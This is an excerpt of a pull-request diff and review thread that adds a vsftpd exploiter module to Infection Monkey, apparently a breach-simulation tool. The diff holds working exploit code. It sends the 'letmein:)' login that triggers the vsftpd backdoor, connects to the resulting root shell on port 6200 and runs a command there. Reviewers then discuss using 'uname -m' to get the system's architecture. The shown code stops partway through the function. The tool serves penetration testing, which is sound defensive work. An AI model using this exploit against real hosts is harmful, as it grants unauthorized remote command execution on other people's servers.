monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,123 @@
+import logging
+from logging import getLogger
+
+import time
+
+import paramiko
+import StringIO
+import socket 
+import sys 
+import time
+
+import infection_monkey.monkeyfs as monkeyfs
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.network.tools import check_tcp_port
+from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+COMMAND = "uname -a"
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux', None]
+    EXPLOIT_TYPE = ExploitType.OTHER
+
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def exploit_host(self):
+        try:
+            LOG.info('[*] Attempting to trigger backdoor...')
+            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+
+            # Attempt to login to trigger backdoor
+            ftp_socket.send(b'USER letmein:)\n')
+            ftp_socket.send(b'PASS please\n')
+            time.sleep(2)
+            ftp_socket.close()
+            LOG.info('[+] Triggered backdoor')
+
+        except Exception:
+            LOG.info('[!] Failed to trigger backdoor on %s' , self.host.ip_addr)
+
+        try:
+            LOG.info('[*] Attempting to connect to backdoor...')
+            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            backdoor_socket.connect((self.host.ip_addr, 6200))
+            LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
+            command = str.encode("uname -o" + '\n')
+            backdoor_socket.send(command)
+            response = backdoor_socket.recv(1024).decode('utf-8')
+            LOG.info('[+] Response for uname -o: %s', response)
+            if 'linux' in response.lower().strip():
+                #command execution is successful
+                self.host.os['type'] = 'linux'
```

Comment:
Instead of OS you can get OS bit type here, because only linux OS are vulnerable, so if it's vulnerable it's linux.

Reply:
Makes sense.

Reply:
I removed uname -o and ran uname -m directly